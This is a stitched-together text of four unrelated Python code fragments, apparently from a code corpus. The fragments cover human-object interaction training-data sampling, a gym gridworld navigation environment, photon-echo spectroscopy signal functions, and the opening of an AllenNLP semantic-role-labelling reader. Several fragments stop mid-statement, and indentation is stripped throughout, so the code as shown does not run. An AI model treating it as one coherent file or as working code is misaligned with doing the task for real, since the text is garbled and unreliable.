idx_list = random.sample(range(len(human_boxes_neg)), len(human_boxes_neg))
idx_list = idx_list[:self.negative_sample_ratio * num_pos]
human_boxes_neg = [human_boxes_neg[i] for i in idx_list]
object_boxes_neg = [object_boxes_neg[i] for i in idx_list]
object_word_embeddings_neg = [object_word_embeddings_neg[i] for i in idx_list]
# spatials_neg = [spatials_neg[i] for i in idx_list]
mask_neg = [mask_neg[i] for i in idx_list]
# generate more negative examples if we have too few
if len(human_boxes_neg) < self.negative_sample_ratio * num_pos and len(human_boxes_neg) != 0:
idx_list = np.random.choice(len(human_boxes_neg), self.negative_sample_ratio * num_pos - len(human_boxes_neg)).tolist()
human_boxes_neg += [human_boxes_neg[i] for i in idx_list]
object_boxes_neg += [object_boxes_neg[i] for i in idx_list]
object_word_embeddings_neg += [object_word_embeddings_neg[i] for i in idx_list]
# spatials_neg += [spatials_neg[i] for i in idx_list]
mask_neg += [mask_neg[i] for i in idx_list]
human_boxes += human_boxes_neg
object_boxes += object_boxes_neg
object_word_embeddings += object_word_embeddings_neg
# spatials += spatials_neg
mask += mask_neg
num_pos_neg = len(human_boxes)
if cfg.DATASETS.NEG_VERB_ALLZERO == 1:
for _ in range(num_pos_neg - num_pos):
ho_pair_labels.append(np.zeros(self.num_classes))
elif cfg.DATASETS.NEG_VERB_ALLZERO == 0:
for _ in range(num_pos_neg - num_pos):
ho_pair_labels.append(self.verb_list_to_vector([57]))
else:
assert (0)
assert len(ho_pair_labels)==num_pos_neg
blobs = {}
# @Done made bbox to shape (1,4), not (1,5), so modified the code here
blobs['human_boxes'] = torch.FloatTensor(human_boxes).reshape(num_pos_neg, 4)
blobs['object_boxes'] = torch.FloatTensor(object_boxes).reshape(num_pos_neg, 4)
blobs['ho_pair_labels_object_centric'] = torch.FloatTensor(ho_pair_labels).reshape(num_pos_neg, self.num_classes)
blobs['object_word_embeddings_object_centric'] = torch.FloatTensor(object_word_embeddings).reshape(num_pos_neg, 300)
blobs['mask_ho'] = torch.FloatTensor(mask).reshape(num_pos_neg, self.num_classes)
blobs['human_labels'] = torch.FloatTensor(human_labels).reshape(num_pos, self.num_classes)
blobs['object_labels'] = torch.FloatTensor(object_labels).reshape(num_pos, self.num_classes)
blobs['pos_num'] = num_pos
return blobs
def augment_box_one(self, bbox, shape):
height = bbox[3] - bbox[1]
width = bbox[2] - bbox[0]
y_center = (bbox[3] + bbox[1]) / 2
x_center = (bbox[2] + bbox[0]) / 2
thres = 0.7
for count in range(20):
ratio = 1 + randint(-10, 10) * 0.01
y_shift = randint(-np.floor(height), np.floor(height)) * 0.1
x_shift = randint(-np.floor(width), np.floor(width)) * 0.1
x1 = max(0, x_center + x_shift - ratio * width / 2)
x2 = min(shape[1] - 1, x_center + x_shift + ratio * width / 2)
y1 = max(0, y_center + y_shift - ratio * height / 2)
y2 = min(shape[0] - 1, y_center + y_shift + ratio * height / 2)
if self.bbox_iou(bbox, np.array([x1, y1, x2, y2])) > thres:
box = np.array([x1, y1, x2, y2]).astype(np.float32)
return box
# @Done removed the first 0 here,
# because I want to directly use the transform function
# and it can be directly processed by pooler
# return np.array([0, bbox[0], bbox[1], bbox[2], bbox[3]]).reshape(1, 5).astype(np.float32)
return bbox
def bbox_iou(self, boxA, boxB):
ixmin = np.maximum(boxA[0], boxB[0])
iymin = np.maximum(boxA[1], boxB[1])
ixmax = np.minimum(boxA[2], boxB[2])
iymax = np.minimum(boxA[3], boxB[3])
iw = np.maximum(ixmax - ixmin + 1., 0.)
ih = np.maximum(iymax - iymin + 1., 0.)
inters = iw * ih
# union
uni = ((boxB[2] - boxB[0] + 1.) * (boxB[3] - boxB[1] + 1.) +
(boxA[2] - boxA[0] + 1.) *
(boxA[3] - boxA[1] + 1.) - inters)
overlaps = inters / uni
return overlaps
def verb_list_to_vector(self, action_list):
action_ = np.zeros(self.num_classes)
for GT_idx in action_list:
action_[GT_idx] = 1
# action_ = action_.reshape(1, self.num_classes)
return action_
def generate_mask(self, mask_list):
mask_ = np.zeros(self.num_classes)
for GT_idx in mask_list:
mask_[GT_idx] = 1
# mask_ = mask_.reshape(1, self.num_classes)
return mask_
def generate_spatial(self, human_box, object_box):
# InteractionPattern = [min(human_box[0], object_box[0]), min(human_box[1], object_box[1]),
# max(human_box[2], object_box[2]), max(human_box[3], object_box[3])]
# height = InteractionPattern[3] - InteractionPattern[1] + 1
# width = InteractionPattern[2] - InteractionPattern[0] + 1
# if height > width:
# H, O = self.bbox_trans(human_box, object_box, 'height')
# else:
# H, O = self.bbox_trans(human_box, object_box, 'width')
# human_box = human_box.numpy()
# object_box = object_box.numpy()
H, O = self.bbox_trans(human_box, object_box)
Pattern = np.zeros((2, 64, 64))
Pattern[0, int(H[1]):int(H[3]) + 1, int(H[0]):int(H[2]) + 1] = 1
Pattern[1, int(O[1]):int(O[3]) + 1, int(O[0]):int(O[2]) + 1] = 1
return Pattern
def bbox_trans(self, human_box_ori, object_box_ori, size=64):
human_box = human_box_ori.copy()
object_box = object_box_ori.copy()
InteractionPattern = [min(human_box[0], object_box[0]), min(human_box[1], object_box[1]),
max(human_box[2], object_box[2]), max(human_box[3], object_box[3])]
height = InteractionPattern[3] - InteractionPattern[1] + 1
width = InteractionPattern[2] - InteractionPattern[0] + 1
if height > width:
ratio = 'height'
else:
ratio = 'width'
# shift the top-left corner to (0,0)
human_box[0] -= InteractionPattern[0]
human_box[2] -= InteractionPattern[0]
human_box[1] -= InteractionPattern[1]
human_box[3] -= InteractionPattern[1]
object_box[0] -= InteractionPattern[0]
object_box[2] -= InteractionPattern[0]
object_box[1] -= InteractionPattern[1]
object_box[3] -= InteractionPattern[1]
if ratio == 'height': # height is larger than width
human_box[0] = 0 + size * human_box[0] / height
human_box[1] = 0 + size * human_box[1] / height
human_box[2] = (size * width / height - 1) - size * (width - 1 - human_box[2]) / height
human_box[3] = (size - 1) - size * (height - 1 - human_box[3]) / height
object_box[0] = 0 + size * object_box[0] / height
object_box[1] = 0 + size * object_box[1] / height
object_box[2] = (size * width / height - 1) - size * (width - 1 - object_box[2]) / height
object_box[3] = (size - 1) - size * (height - 1 - object_box[3]) / height
# Need to shift horizontally
InteractionPattern = [min(human_box[0], object_box[0]), min(human_box[1], object_box[1]),
max(human_box[2], object_box[2]), max(human_box[3], object_box[3])]
# assert (InteractionPattern[0] == 0) & (InteractionPattern[1] == 0) & (InteractionPattern[3] == 63) & (InteractionPattern[2] <= 63)
if human_box[3] > object_box[3]:
human_box[3] = size - 1
else:
object_box[3] = size - 1
shift = size / 2 - (InteractionPattern[2] + 1) / 2
human_box += [shift, 0, shift, 0]
object_box | |
<filename>env/gym_nav/envs/gridworld_env.py
import numpy as np
import gym
import matplotlib.pyplot as plt
from gym import spaces
class GridworldNav(gym.Env):
metadata = {"render.modes": ['rgb_array', 'human'], 'video.frames_per_second': 24}
def __init__(self, view_width=2, max_steps=200, give_direction=False, world_gen_func={},
world_size=20, give_dist=False, give_time=False, num_obstacles=0, goal_size=1,
skeleton=True, goal_reward=1, reward_shaping=0, sub_goal_reward=0.01,
wall_colors=1, task_structure=1, goal_wiggle=0, poster=False):
'''
General gridworld with 2d rays of vision. Agent gets to rotate or move forward
view_width: how many rows to the left and right agent is able to see
give_direction: include in observation currently faced direction
give_dist: whether to include distances to objects seen in observation
world_size: length and width of world
num_obstacles: number of randomly generated obstacles
goal_size: how big goal should be in length an width
goal_reward: amount of reward earned in reaching goal
reward_shaping: how reward should be given
0: only when goal is reached
1: always give additional reward inv prop to dist to goal
2: when goal is in sight, give additional reward inv proportional to dist to goal
3: when goal has been seen once, give additional reward inv prop
to dist to goal
(for 1-3, also give reward when goal reached)
sub_goal_reward: max reward given by sub-task (from reward shaping)
wall_colors: how many colors the walls should take (1, 2, 2.5, 3, 4)
1: red, red, red, red
2: red, green, red, green
2.5 (alt configuration): red, red, green, green
3: red, green, red, blue
3.5 (alt configuration): red, red, green, blue
4: red, green, blue, purple
task_structure: the exact type of task given
1: visible goal, resetting position every episode
2: invisible goal, fixed position for goal
goal_wiggle: whether goal should be moved from its fixed position randomly
poster: set to a number to choose a position for the "poster"
'''
super(GridworldNav, self).__init__()
self.object_to_idx = {
'wall': 1,
'goal': 2
}
self.color_to_idx = {
'invisible': 0,
'red': 1,
'green': 2,
'blue': 3,
'yellow': 4,
'purple': 5,
'white': 6
}
self.idx_to_rgb = {
1: np.array([0.9, 0, 0]),
2: np.array([0, 0.9, 0]),
3: np.array([0, 0, 0.9]),
4: np.array([0.9, 0.9, 0]),
5: np.array([0.9, 0, 0.9]),
6: np.array([0.9, 0.9, 0.9])
}
self.action_keys = {
0: 'left',
1: 'forward',
2: 'right',
3: 'nothing'
}
self.current_steps = 0
#generate the character icon
self.char_icon = np.zeros([15, 15, 3])
self.char_icon[2:14, 2:4] = [1, 1, 0]
self.char_icon[3:13, 4:6] = [1, 1, 0]
self.char_icon[4:12, 6:8] = [1, 1, 0]
self.char_icon[5:11, 8:10] = [1, 1, 0]
self.char_icon[6:10, 10:12] = [1, 1, 0]
self.char_icon[7:9, 12:14] = [1, 1, 0]
# if skeleton is False:
#convention of world:
# first index is y position (down is +1, up is -1)
# second index is x position (left is -1, right is +1)
self.world_size = [world_size, world_size]
self.objects = np.zeros(self.world_size)
self.visible = np.zeros(self.world_size)
self.obstacles = np.zeros(self.world_size)
self.num_obstacles = num_obstacles
self.goal_size = goal_size
self.goal_reward = goal_reward
self.sub_goal_reward = sub_goal_reward
self.reward_shaping = reward_shaping
self.goal_seen = False #tracking whether goal seen yet
self.wall_colors = wall_colors
self.task_structure = task_structure
self.goal_wiggle = goal_wiggle
self.agent = [[0, 0], 0] #agent has a position and direction
self.poster = poster
#direction is 0: right, 1: up, 2: left, 3: down
self.view_width = view_width
self.max_steps = max_steps
self.give_direction = give_direction
self.give_dist = give_dist
self.give_time = give_time
total_width = view_width * 2 + 1
observation_width = total_width
if give_dist:
observation_width = observation_width * 2
if give_direction:
observation_width += 1
if give_time:
observation_width += 1
self.observation_space = spaces.Box(0, 6, shape=(observation_width,))
self.action_space = spaces.Discrete(4)
self.generate_world()
self.randomize_agent_pos()
def step(self, action):
collision = False
done = False
reward = 0
# -----Perform Action ------ #
if action == 0:
self.agent[1] = (self.agent[1] + 1) % 4
elif action == 2:
self.agent[1] = (self.agent[1] - 1) % 4
elif action == 1:
pos = self.agent[0].copy()
if self.agent[1] == 0:
pos[1] += 1
elif self.agent[1] == 1:
pos[0] -= 1
elif self.agent[1] == 2:
pos[1] -= 1
elif self.agent[1] == 3:
pos[0] += 1
if pos[0] < 0 or pos[0] >= self.world_size[0] or \
pos[1] < 0 or pos[1] >= self.world_size[1]:
#cannot walk off edge of world
pass
elif self.obstacles[pos[0], pos[1]] == 0:
self.agent[0] = pos
else:
collision = pos
#check if reaching a goal
if self.objects[pos[0], pos[1]] == 2:
reward = self.goal_reward
done = True
#get observation
obs, colors = self.get_observation()
#-------- Reward Shaping -------#
#calc dist to goal
y, x = self.agent[0]
space_dists = np.abs(np.array([np.arange(self.world_size[0]) - y]).T) + \
np.abs(np.array([np.arange(self.world_size[1]) - x]))
dist_to_goal = np.min(space_dists[self.objects == 2])
max_dist = 2 * self.world_size[0]
goal_in_view = np.any(colors == 6)
if goal_in_view:
self.goal_seen = True
#reward shaping 1: give reward based on distance away for goal
if self.reward_shaping == 1:
reward += (1 - (dist_to_goal / max_dist)) * self.sub_goal_reward
#reward shaping 2: give reward based on whether goal is
#in sight and how far it is
if self.reward_shaping == 2:
if goal_in_view:
reward += (1 - (dist_to_goal / max_dist)) * self.sub_goal_reward
#reward shaping 3: give reward based on whether goal is seen
#and once seen, give for total distance away
if self.reward_shaping == 3:
if self.goal_seen:
reward += (1 - (dist_to_goal / max_dist)) * self.sub_goal_reward
#--- Update Steps ---#
self.current_steps += 1
if self.current_steps >= self.max_steps:
done = True
return obs, reward, done, {}
def get_observation(self):
'''
Get observations based on vision lines. The agent sees to the left and right
of where it is facing in a straight line. If the vision collides with an object (we assume
it always does because there are walls, but without walls we would have to change it slightly)
then we get a dist to the object and the color of the object
'''
#vision lines
if self.agent[1] == 0:
start = self.agent[0][1]
end = self.world_size[1]
left = self.agent[0][0] - self.view_width
right = self.agent[0][0] + self.view_width
left_idx = np.clip(left, 0, self.world_size[0])
right_idx = np.clip(right, 0, self.world_size[0])
left_right_idx = 0
vis = self.visible[left_idx:right_idx+1, start:end]
elif self.agent[1] == 1:
start = 0
end = self.agent[0][0]
left = self.agent[0][1] - self.view_width
right = self.agent[0][1] + self.view_width
left_idx = np.clip(left, 0, self.world_size[1])
right_idx = np.clip(right, 0, self.world_size[1])
left_right_idx = 1
vis = np.rot90(self.visible[start:end+1, left_idx:right_idx+1], k=3)
elif self.agent[1] == 2:
start = 0
end = self.agent[0][1]
left = self.agent[0][0] + self.view_width
right = self.agent[0][0] - self.view_width
left_idx = np.clip(left, 0, self.world_size[0])
right_idx = np.clip(right, 0, self.world_size[0])
left_right_idx = 0
vis = np.rot90(self.visible[right_idx:left_idx+1, start:end+1], k=2)
elif self.agent[1] == 3:
start = self.agent[0][0]
end = self.world_size[0]
left = self.agent[0][1] + self.view_width
right = self.agent[0][1] - self.view_width
left_idx = np.clip(left, 0, self.world_size[1])
right_idx = np.clip(right, 0, self.world_size[1])
left_right_idx = 1
vis = np.rot90(self.visible[start:end, right_idx:left_idx+1], k=1)
dists = np.argmax(vis > 0, axis=1)
colors = vis[np.arange(vis.shape[0]), dists]
if left < 0:
dists = np.append([0]*-left, dists)
colors = np.append([0]*-left, colors)
if left >= self.world_size[left_right_idx]:
dists = np.append([0]*(self.world_size[left_right_idx] + 1 - left), dists)
colors = np.append([0]*(self.world_size[left_right_idx] + 1 - left), colors)
if right < 0:
dists = np.append(dists, [0]*-right)
colors = np.append(colors, [0]*-right)
if right >= self.world_size[left_right_idx]:
dists = np.append(dists, [0]*(self.world_size[left_right_idx] + 1 - right))
colors = np.append(colors, [0]*(self.world_size[left_right_idx] + 1 - right))
obs = np.array(colors)
if self.give_dist:
obs = np.append(obs, dists)
if self.give_direction:
obs = np.append(obs, [self.agent[1]])
if self.give_time:
obs = np.append(obs, [self.current_steps])
return obs, colors
def find_empty_space(self, dist_from_others=0):
'''
Search for an empty space uniformly at random to populate with
'''
while True:
y = np.random.randint(0, self.world_size[0])
x = np.random.randint(0, self.world_size[1])
if self.obstacles[y, x] == 0 and self.objects[y, x] == 0:
if dist_from_others > 0:
y_range = np.clip([y-dist_from_others, y+dist_from_others+1],
[0, 0], [self.world_size[0], self.world_size[0]])
x_range = np.clip([x-dist_from_others, x+dist_from_others+1],
[0, 0], [self.world_size[1], self.world_size[1]])
if np.all(self.obstacles[y_range[0]:y_range[1], x_range[0]:x_range[1]] == 0):
return y, x
else:
return y, x
def reset(self):
self.current_steps = 0
self.generate_world()
self.goal_seen = False
self.randomize_agent_pos()
obs, colors = self.get_observation()
return obs
def generate_world(self):
'''
Reset the world
'''
self.objects = np.zeros(self.world_size)
self.visible = np.zeros(self.world_size)
self.obstacles = np.zeros(self.world_size)
self.generate_walls()
#generate random obstacles
for i in range(self.num_obstacles):
y, x = | |
b]))
for d in f_idx:
G_db = -1j * np.exp(-1j * (evals[d]-evals[b])*t3 - \
((gamma[d] + gamma[b])/2.0 + gammaD[d, b])*t3)
signal += dip[b,a] * dip[c,a] * dip[d,c]* dip[b,d] * \
G_db * U_cb * G_ab
# 1 interaction in the bra side
sign = -1
return sign * signal
def GSB(evals, dip, omega1, omega3, tau2, g_idx, e_idx, gamma):
'''
gg -> ge -> gg' -> e'g' -> g'g'
Parameters
----------
evals : TYPE
DESCRIPTION.
dip : TYPE
DESCRIPTION.
omega3 : TYPE
DESCRIPTION.
t2 : TYPE
DESCRIPTION.
omega1 : TYPE
DESCRIPTION.
g_idx: list of integers
indexes for ground manifold
e_idx: list of integers
indexes for excited state manifold
Returns
-------
chi : TYPE
DESCRIPTION.
'''
n1, n3 = len(omega1), len(omega3)
signal = np.zeros((n1, n3), dtype=complex)
a = 0
c = 0
# for i in range(n1):
# pump = omega1[i]
# for j in range(n3):
# probe = omega3[j]
pump, probe = np.meshgrid(omega1, omega3)
# sum-over-states
for b in e_idx:
G_ab = 1./(pump - (evals[a]-evals[b]) + 1j * (gamma[a] + gamma[b])/2.0)
# for c in g_idx:
# U_ac = -1j * np.exp(-1j * (evals[a] - evals[c]) * tau2 - (gamma[a] + gamma[c])/2. * tau2)
for d in e_idx:
G_dc = 1./(probe - (evals[d]-evals[c]) + 1j * (gamma[d] + gamma[c])/2.0)
signal += dip[a,b] * dip[b,c] * dip[c,d]* dip[d,a] * \
G_dc * G_ab
return signal
# def _GSB(evals, dip, omega1, omega2, t3, g_idx, e_idx, gamma):
# '''
# GSB for photon echo
# gg -> ge -> gg' -> e'g' -> g'g'
# Parameters
# ----------
# evals : TYPE
# DESCRIPTION.
# dip : TYPE
# DESCRIPTION.
# omega3 : TYPE
# DESCRIPTION.
# t2 : TYPE
# DESCRIPTION.
# omega1 : TYPE
# DESCRIPTION.
# g_idx: list of integers
# indexes for ground manifold
# e_idx: list of integers
# indexes for excited state manifold
# Returns
# -------
# chi : TYPE
# DESCRIPTION.
# '''
# n1, n3 = len(omega1), len(omega2)
# signal = np.zeros((n1, n3), dtype=complex)
# a = 0
# c = 0
# pump, probe = np.meshgrid(omega1, omega2)
# # sum-over-states
# for b in e_idx:
# G_ab = 1./(pump - (evals[a]-evals[b]) + 1j * (gamma[a] + gamma[b])/2.0)
# for d in e_idx:
# G_dc = 1./(probe - (evals[d]-evals[c]) + 1j * (gamma[d] + gamma[c])/2.0)
# signal += dip[a,b] * dip[b,c] * dip[c,d]* dip[d,a] * \
# G_dc * G_ab
# return signal
def SE(evals, dip, omega1, omega3, tau2, g_idx, e_idx, gamma):
'''
Stimulated emission gg -> ge -> e'e -> g'e -> g'g' in the impulsive limit.
The signal wave vector is ks = -k1 + k2 + k3
Parameters
----------
evals : TYPE
DESCRIPTION.
dip : TYPE
DESCRIPTION.
omega3 : TYPE
DESCRIPTION.
t2 : TYPE
DESCRIPTION.
omega1 : TYPE
DESCRIPTION.
g_idx: list of integers
indexes for ground manifold
e_idx: list of integers
indexes for excited state manifold
Returns
-------
chi : TYPE
DESCRIPTION.
'''
signal = np.zeros((len(omega1), len(omega3)), dtype=complex)
a = 0
# for i in range(len(omega1)):
# pump = omega1[i]
# for j in range(len(omega3)):
# probe = omega3[j]
pump, probe = np.meshgrid(omega1, omega3)
# sum-over-states
for b in e_idx:
G_ab = 1./(pump - (evals[a]-evals[b]) + 1j * (gamma[a] + gamma[b])/2.0)
for c in e_idx:
U_cb = -1j * np.exp(-1j * (evals[c] - evals[b]) * tau2 - (gamma[c] + gamma[b])/2. * tau2)
for d in g_idx:
G_cd = 1./(probe - (evals[c]-evals[d]) + 1j * (gamma[c] + gamma[d])/2.0)
signal += dip[a,b] * dip[c,a] * dip[d,c]* dip[b, d] * \
G_cd * U_cb * G_ab
return signal
def _SE(E, dip, omega1, omega2, t3, g_idx, e_idx, gamma, dephasing=10/au2mev):
'''
Stimulated emission gg -> ge -> e'e -> g'e -> g'g' in the impulsive limit.
The signal wave vector is ks = -k1 + k2 + k3
Parameters
----------
evals : TYPE
DESCRIPTION.
dip : TYPE
DESCRIPTION.
omega3 : TYPE
DESCRIPTION.
t2 : TYPE
DESCRIPTION.
omega1 : TYPE
DESCRIPTION.
g_idx: list of integers
indexes for ground manifold
e_idx: list of integers
indexes for excited state manifold
Returns
-------
chi : TYPE
DESCRIPTION.
'''
signal = np.zeros((len(omega2), len(omega1)), dtype=complex)
a = 0
pump, probe = np.meshgrid(omega1, omega2)
N = len(E)
# define pure dephasing rate
gammaD = np.ones((N, N)) * dephasing
np.fill_diagonal(gammaD, 0)
# sum-over-states
for b in e_idx:
G_ab = 1./(pump - (E[a]-E[b]) + 1j * ((gamma[a] + gamma[b])/2.0 + gammaD[a, b]))
for c in e_idx:
U_cb = 1./(probe - (E[c]-E[b]) + 1j* ((gamma[c] + gamma[b])/2. + gammaD[c, b]))
for d in g_idx:
G_cd = -1j * np.exp(-1j * (E[c]-E[d])*t3 - ((gamma[c] + gamma[d])/2.0 + gammaD[c, d])*t3)
signal += dip[a,b] * dip[c,a] * dip[d,c]* dip[b, d] * \
G_cd * U_cb * G_ab
return signal
def _photon_echo(evals, edip, omega1, omega3, t2, g_idx, e_idx, f_idx, gamma):
"""
2D photon echo signal scanning omega1 and omega3 at population time t2.
Parameters
----------
evals : ndarray
eigenvalues of system.
edip : ndarray
electric dipole matrix.
omega1 : TYPE
DESCRIPTION.
omega3 : TYPE
DESCRIPTION.
tau2 : TYPE
DESCRIPTION.
g_idx : TYPE
DESCRIPTION.
e_idx : TYPE
DESCRIPTION.
gamma : TYPE
DESCRIPTION.
Returns
-------
TYPE
DESCRIPTION.
"""
gsb = GSB(evals, edip, omega1, omega3, t2, g_idx, e_idx, gamma)
se = SE(evals, edip, omega1, omega3, t2, g_idx, e_idx, gamma)
esa = ESA(evals, edip, omega1, omega3, t2, g_idx, e_idx, f_idx, gamma)
return gsb + se + esa
def photon_echo_t3(mol, omega1, omega2, t3, g_idx=[0], e_idx=None, f_idx=None,\
fname='2DES', plt_signal=False, separate=False):
"""
2D photon echo signal scanning omega1 and omega2 at detection time t3.
The current implementation only applies for a single ground state.
For a manifold of g states, the ground state bleaching neglected here has to be considered.
Parameters
----------
evals : ndarray
eigenvalues of system.
edip : ndarray
electric dipole matrix.
omega1 : TYPE
DESCRIPTION.
omega3 : TYPE
DESCRIPTION.
tau2 : TYPE
DESCRIPTION.
g_idx : TYPE
DESCRIPTION.
e_idx : TYPE
DESCRIPTION.
gamma : TYPE
DESCRIPTION.
separate: bool
separate the ladder diagrams
Returns
-------
TYPE
DESCRIPTION.
"""
E = mol.eigvals()
edip = mol.edip_rms
gamma = mol.gamma
dephasing = mol.dephasing
if gamma is None:
raise ValueError('Please set the decay constants gamma first.')
N = mol.nstates
if e_idx is None: e_idx = range(1, N)
if f_idx is None: f_idx = range(1, N)
# gsb = _GSB(evals, edip, omega1, omega3, t2, g_idx, e_idx, gamma)
se = _SE(E, edip, -omega1, omega2, t3, g_idx, e_idx, gamma, dephasing=dephasing)
esa = _ESA(E, edip, -omega1, omega2, t3, g_idx, e_idx, f_idx, \
gamma, dephasing=dephasing)
S = se + esa
if plt_signal == True:
# make plots
fig, ax = plt.subplots(refaspect=2)
im = ax.contourf(omega1*au2ev, omega2*au2ev, S.real/abs(S).max(), #interpolation='bilinear',
cmap=cm.RdBu, lw=0.6,
origin='lower') #-abs(SPE).max())
ax.set_xlabel(r'$-\Omega_1$ (eV)')
ax.set_ylabel(r'$\Omega_2$ (eV)')
if separate:
np.savez(fname, omega1, omega2, se, esa)
return se, esa
else:
np.savez(fname, omega1, omega2, S)
return S
def photon_echo(mol, pump, probe, t2=0., g_idx=[0], e_idx=None, f_idx=None, fname='signal', \
plt_signal=False, pol=None):
"""
Photon echo signal for a multi-level system using SOS expression.
Approximations:
1. decay are included phenomelogically
2. no population relaxation
Parameters
----------
mol : TYPE
DESCRIPTION.
pump : TYPE
Omega1, conjugate variable of t1
probe : TYPE
Omega3, conjugate variable of t3
t2 : TYPE
population time.
g_idx : TYPE
DESCRIPTION.
e_idx : TYPE
DESCRIPTION.
f_idx : TYPE
DESCRIPTION.
gamma : float
decay rates for excited states.
Raises
------
ValueError
DESCRIPTION.
Returns
-------
S : TYPE
DESCRIPTION.
"""
E = mol.eigvals()
dip = mol.edip_rms
gamma = mol.gamma
if gamma is None:
raise ValueError('Please set the decay constants gamma first.')
N = mol.nstates
if e_idx is None: e_idx = range(N)
if f_idx is None: f_idx = range(N)
# compute the signal
S = _photon_echo(E, dip, omega1=-pump, omega3=probe, t2=t2, g_idx=g_idx, e_idx=e_idx, f_idx=f_idx,\
gamma=gamma)
np.savez(fname, pump, probe, S)
if plt_signal == True:
# make plots
fig, ax = plt.subplots()
omega_min = min(pump) * au2ev
omega_max = max(pump) * au2ev
im = ax.contour(S.real.T/abs(S).max(), #interpolation='bilinear',
cmap=cm.RdBu,
origin='lower', extent=[omega_min, omega_max, omega_min, omega_max],
vmax=1, vmin=-1) #-abs(SPE).max())
ax.plot(pump*au2ev, probe*au2ev, '--', lw=1, color='grey')
# ax.axhline(y=1.1, color='w', linestyle='--', linewidth=0.5, alpha=0.5)
# ax.axhline(y=0.9, color='w', linestyle='--', linewidth=0.5, alpha=0.5)
#
# ax.axvline(x=1.1, color='w', linestyle='--', linewidth=0.5, alpha=0.5)
# ax.axvline(x=0.9, color='w', linestyle='--', linewidth=0.5, alpha=0.5)
#im = ax.contour(SPE,
# origin='lower', extent=[0.8, omega_max, omega_min, omega_max],
# vmax=1, vmin=0) #-abs(SPE).max())
ax.set_xlabel(r'$-\Omega_1$ (eV)')
ax.set_ylabel(r'$\Omega_3$ | |
<gh_stars>0
import logging
from typing import Dict, List, Iterable, Tuple, Any, Optional
from overrides import overrides
from pytorch_pretrained_bert.tokenization import BertTokenizer
from allennlp.common.file_utils import cached_path
from allennlp.data.dataset_readers.dataset_reader import DatasetReader
from allennlp.data.fields import Field, TextField, SequenceLabelField, MetadataField
from allennlp.data.instance import Instance
from allennlp.data.token_indexers import SingleIdTokenIndexer, TokenIndexer
from allennlp.data.tokenizers import Token
from allennlp.data.dataset_readers.dataset_utils import Ontonotes, OntonotesSentence
import warnings
import torch
from torch.nn.modules import Linear, Dropout
import torch.nn.functional as F
from torch.nn.modules import Linear, Dropout
from torch.nn.parameter import Parameter
from torch.nn.modules.module import Module
import torch.optim as optim
import numpy as np
import scipy.sparse as sp
from allennlp.common.checks import check_dimensions_match
from allennlp.data import Vocabulary
from allennlp.models.srl_util import convert_bio_tags_to_conll_format, write_bio_formatted_tags_to_file
from allennlp.modules import Seq2SeqEncoder, TimeDistributed, TextFieldEmbedder
from allennlp.modules.seq2seq_encoders import PytorchSeq2SeqWrapper
from allennlp.modules.token_embedders import Embedding
from allennlp.models.model import Model
from allennlp.nn import InitializerApplicator, RegularizerApplicator
from allennlp.nn.util import get_text_field_mask, sequence_cross_entropy_with_logits
from allennlp.nn.util import get_lengths_from_binary_sequence_mask, viterbi_decode
from allennlp.training.metrics.srl_eval_scorer import SrlEvalScorer, DEFAULT_SRL_EVAL_PATH
from allennlp.data.iterators import BucketIterator
from allennlp.training.trainer import Trainer
from allennlp.modules.stacked_alternating_lstm import StackedAlternatingLstm
from allennlp.modules.text_field_embedders import BasicTextFieldEmbedder
from allennlp.modules.seq2seq_encoders.stacked_self_attention import StackedSelfAttentionEncoder
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
def _convert_tags_to_wordpiece_tags(tags: List[str], offsets: List[int]) -> List[str]:
"""
Converts a series of BIO tags to account for a wordpiece tokenizer,
extending/modifying BIO tags where appropriate to deal with words which
are split into multiple wordpieces by the tokenizer.
This is only used if you pass a `bert_model_name` to the dataset reader below.
Parameters
----------
tags : `List[str]`
The BIO formatted tags to convert to BIO tags for wordpieces
offsets : `List[int]`
The wordpiece offsets.
Returns
-------
The new BIO tags.
"""
new_tags = []
j = 0
for i, offset in enumerate(offsets):
tag = tags[i]
is_o = tag == "O"
is_start = True
while j < offset:
if is_o:
new_tags.append("O")
elif tag.startswith("I"):
new_tags.append(tag)
elif is_start and tag.startswith("B"):
new_tags.append(tag)
is_start = False
elif tag.startswith("B"):
_, label = tag.split("-", 1)
new_tags.append("I-" + label)
j += 1
# Add O tags for cls and sep tokens.
return ["O"] + new_tags + ["O"]
def _convert_verb_indices_to_wordpiece_indices(verb_indices: List[int], offsets: List[int]): # pylint: disable=invalid-name
"""
Converts binary verb indicators to account for a wordpiece tokenizer,
extending/modifying BIO tags where appropriate to deal with words which
are split into multiple wordpieces by the tokenizer.
This is only used if you pass a `bert_model_name` to the dataset reader below.
Parameters
----------
verb_indices : `List[int]`
The binary verb indicators, 0 for not a verb, 1 for verb.
offsets : `List[int]`
The wordpiece offsets.
Returns
-------
The new verb indices.
"""
j = 0
new_verb_indices = []
for i, offset in enumerate(offsets):
indicator = verb_indices[i]
while j < offset:
new_verb_indices.append(indicator)
j += 1
# Add 0 indicators for cls and sep tokens.
return [0] + new_verb_indices + [0]
class SrlReader(DatasetReader):
"""
This DatasetReader is designed to read in the English OntoNotes v5.0 data
for semantic role labelling. It returns a dataset of instances with the
following fields:
tokens : ``TextField``
The tokens in the sentence.
verb_indicator : ``SequenceLabelField``
A sequence of binary indicators for whether the word is the verb for this frame.
tags : ``SequenceLabelField``
A sequence of Propbank tags for the given verb in a BIO format.
Parameters
----------
token_indexers : ``Dict[str, TokenIndexer]``, optional
We similarly use this for both the premise and the hypothesis. See :class:`TokenIndexer`.
Default is ``{"tokens": SingleIdTokenIndexer()}``.
domain_identifier: ``str``, (default = None)
A string denoting a sub-domain of the Ontonotes 5.0 dataset to use. If present, only
conll files under paths containing this domain identifier will be processed.
bert_model_name : ``Optional[str]``, (default = None)
The BERT model to be wrapped. If you specify a bert_model here, then we will
assume you want to use BERT throughout; we will use the bert tokenizer,
and will expand your tags and verb indicators accordingly. If not,
the tokens will be indexed as normal with the token_indexers.
Returns
-------
A ``Dataset`` of ``Instances`` for Semantic Role Labelling.
"""
def __init__(self,
token_indexers: Dict[str, TokenIndexer] = None,
domain_identifier: str = None,
lazy: bool = False,
bert_model_name: str = None) -> None:
super().__init__(lazy)
self._token_indexers = token_indexers or {"tokens": SingleIdTokenIndexer()}
self._domain_identifier = domain_identifier
if bert_model_name is not None:
self.bert_tokenizer = BertTokenizer.from_pretrained(bert_model_name)
self.lowercase_input = "uncased" in bert_model_name
else:
self.bert_tokenizer = None
self.lowercase_input = False
def _wordpiece_tokenize_input(self, tokens: List[str]) -> Tuple[List[str], List[int], List[int]]:
"""
